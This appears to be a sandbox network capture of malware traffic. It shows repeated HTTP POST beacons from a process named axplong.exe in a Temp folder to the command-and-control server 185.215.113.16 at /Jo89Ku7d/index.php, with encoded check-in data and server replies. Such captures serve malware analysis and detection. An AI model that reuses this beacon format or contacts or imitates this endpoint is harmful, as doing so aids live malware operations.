                  Sep 26, 2024 19:52:40.306946039 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:40.533605099 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  34 | 192.168.2.5 | 49746 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:40.651848078 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:41.340588093 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:41.341696978 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:41.563433886 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  35 | 192.168.2.5 | 49747 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:41.684864044 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:42.398369074 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:42.399060011 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:42.638597965 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  36 | 192.168.2.5 | 49748 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:42.746433020 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:43.504317999 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:43.505405903 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:43.728470087 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  37 | 192.168.2.5 | 49749 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:43.965764999 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:44.760117054 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:44.760895014 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:45.018640041 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  38 | 192.168.2.5 | 49750 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:45.136738062 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:45.872601986 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:45.873878002 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:46.102363110 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  39 | 192.168.2.5 | 49751 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:46.222337961 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:46.929013968 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:46.929982901 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:47.157448053 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  40 | 192.168.2.5 | 49752 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:47.277502060 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:48.001543045 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:48.002345085 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:48.234405041 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  41 | 192.168.2.5 | 49753 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:48.357139111 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:49.080169916 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:49.081532001 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:49.308681965 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  42 | 192.168.2.5 | 49754 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:49.433639050 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:50.126606941 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:50.127507925 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:50.351277113 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  43 | 192.168.2.5 | 49755 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:50.464840889 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:51.179711103 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:51.180469036 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:51.407063961 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  44 | 192.168.2.5 | 49756 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:51.602061987 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:52.312113047 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:52.313121080 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:52.541975975 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  45 | 192.168.2.5 | 49757 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:52.656029940 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:53.356956959 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:53.357713938 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:53.580178022 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  46 | 192.168.2.5 | 49758 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:53.699728966 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:54.399414062 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:54.400074005 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:54.623898983 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  47 | 192.168.2.5 | 49759 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:54.746485949 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:55.495796919 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:55.496505976 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:55.720407009 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  48 | 192.168.2.5 | 49760 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:55.839996099 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:56.574448109 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:56.575239897 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:56.810282946 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


